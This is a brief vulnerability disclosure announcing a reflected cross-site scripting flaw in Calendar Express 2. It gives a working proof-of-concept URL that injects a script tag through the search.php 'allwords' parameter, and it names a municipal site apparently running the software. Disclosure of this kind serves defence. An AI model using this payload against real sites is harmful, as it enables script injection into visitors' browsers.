Calendar Express 2 suffers from a cross site scripting flaw.
4cd8e3c4c7d682bf25243c763aebbe13a15f3a74ceb537e15ea4ed2e36b77ec2
hey guys .. check out this new xss i just found ;P
Vulnerable : Calendar Express 2
web : http://www.ci.emeryville.ca.us/calendar, http://www.phplite.com/products/calendarexpress/
XSS :
http://127.0.0.1/calendar/search.php?allwords=%22%3E%3Cscript%3Ealert%28%27bl4ck%27%29%3C%2Fscript%3E&cid=1&title=1&desc=1
################################
Discovered By BLacK ZeRo
K.S.A
bL4ck@bsdmail.org
################################
Best regards ,,